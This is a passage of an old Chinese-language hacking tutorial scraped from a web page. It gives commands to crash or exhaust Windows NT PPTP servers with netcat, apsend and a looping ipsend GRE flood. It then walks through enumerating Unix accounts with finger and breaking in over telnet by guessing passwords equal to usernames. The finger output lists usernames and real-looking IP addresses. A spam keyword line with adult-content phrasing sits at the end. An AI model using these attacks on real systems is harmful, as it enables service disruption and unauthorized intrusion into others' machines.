• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
  • 流行的漏洞入侵(四)

    發表于:2007-07-02來源:作者:點擊數: 標簽:
    6 教你DoS攻擊微軟的PPTP 呵呵,大家沒有看錯,的確是微軟的,我們先看看PPTP是個什么東東PPTP(Piont-to-point Tunneling Protocol 點對點傳輸協議)是一個用以建立VPN的 網絡 協議. 此協議需TCP(端口1723)和GRE以完成工作. 易收攻擊系統: * Dell PowerEdge 2200
    6 教你DoS攻擊微軟的PPTP
    呵呵,大家沒有看錯,的確是微軟的,我們先看看PPTP是個什么東東PPTP(Piont-to-point Tunneling Protocol 點對點傳輸協議)是一個用以建立VPN的網絡協議. 此協議需TCP(端口1723)和GRE以完成工作.
    易收攻擊系統:
    * Dell PowerEdge 2200 with Intel 10/100 adapter, 256 MB RAM, NT Server 4.0
    * Dell Dimension XPS M200s with 3Com 905B adapter, 64 MB RAM, NT Server 4.0

    安全的系統:
    * HP Vectra XA with AMD PCNet integrated Ethernet, 128 MB RAM, NT Workstation 4.0
    * Dell Latitude CPx with 3Com 3CCFEM656 PC Card adapter, 128 MB RAM, NT Workstation 4.0
    * Generic dual PII (Asus motherboard) with 3Com 980x adapter, 256 MB RAM, NT Server 4.0
    * Dell Dimension XPS T550 with 3Com 905C-TX adapter, 128 MB RAM, NT Workstation 4.0

    如何實現:
    ~~~~~~~~~
    *需要的工具*
    1.UNIX box(例如linux,*bsd....)
    2.netcat ( )
    3.apsend ( )
    4.ipsend ( )

    OK,這就好說了,
    我們來看它的三個BUG
    1 TCP端口1723
    此弱點只在prior至SP6的機器上有效。并不是所有的機器都存在這個漏洞;請在Unix 操作系統內鍵入以下:
    $ nc 1723 < /dev/zero

    如機器存在此漏洞, 目標主機將在幾秒種之內藍屏,并有如下錯誤:
    STOP 0x0A (0x0, 0x2, 0x0, 0x0) IRQL_NOT_LESS_OR_EQUAL
    再次提醒,此弱點只對部分機器有效

    2 GRE
    此弱點對所有Service pack有效
    在目標機器上,打開任務管理器選擇“運行”。并打開 一個DOS窗口(開始-運行-CMD).在Unix類操作系統上:
    $ apsend -d --protocol 47 -m 0 -q
    在目標主機上你將看到任務管理器內內核記憶的數字將緩慢上升。最終,這些數字將停止增加;此時, CPU在一段時間內有可能被100%占用?,F在你可以試著在命令提示符后鍵入一個命令例如DIR,這時你將看 到一個信息說提示操作系統已不可能完成要執行的命令

    3弱點三:GRE
    此弱點同樣對所有的Service pack有效。請在Unix操作系統上:
    #!/bin/csh
    foo:
    ipsend -i -P gre > /dev/null
    goto foo
    目標主機很快會藍屏,大概需要50個數據包。
    明白了吧

    7 UNIX攻擊
    這里為了方便我們用finger 0@ip 來找UNIX的薄弱機器
    C:\>finger 0@IP
    xxx.xxx.xxx.xxx]

    Login Name TTY Idle When Where

    daemon ??? < . . . . >

    bin ??? < . . . . >

    sys ??? < . . . . >

    jeffrey ??? pts/0 203.66.149.11

    daniel ??? 437 114cm.kcable.

    jamie ??? 0 203.66.162.68

    postgres ??? pts/2 203.66.162.80

    nsadmin ??? 768 203.66.19.50

    ho ??? 390 61.169.209.106

    house18 ??? pts/1 203.66.250.1

    tong ??? pts/0 210.226. 42.69

    jliu ??? pts/0 203.66.52.87

    ptai ??? < . . . . >

    看到了嗎,這里的LOGIN下的就是我們要的用戶名了
    比如jeffrey,Daniel,Jamie,postgres
    下面我們就來入侵
    C:\>telnet xxx.xxx.xxx.xxx
    一般的情況下我們都是猜密碼,怎么猜??就是上面LOGIN下的用戶名讓它又做用戶名和密碼呀,事實上總有一些人為了方便是這么設置的
    login: ptai (***輸入用戶名***)

    Password: **** (***輸入密碼***)

    Login incorrect (***登陸失敗***)

    login: jliu

    Password:

    Login incorrect

    $ login: tong

    Password:

    Last login: Mon Jul 2 13:21:55 from 210.226. 42.69 (***這個用戶上次登陸時的IP***)

    Sun Microsystems Inc. SunOS 5.6 Generic August 1997

    You have mail. (***HOHO~登陸成功啦***)
    看看這不就進來了
    $ uname –a (***查看系統版本和補丁信息***)
    $ set (***查看一些系?

    原文轉自:http://www.kjueaiud.com

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>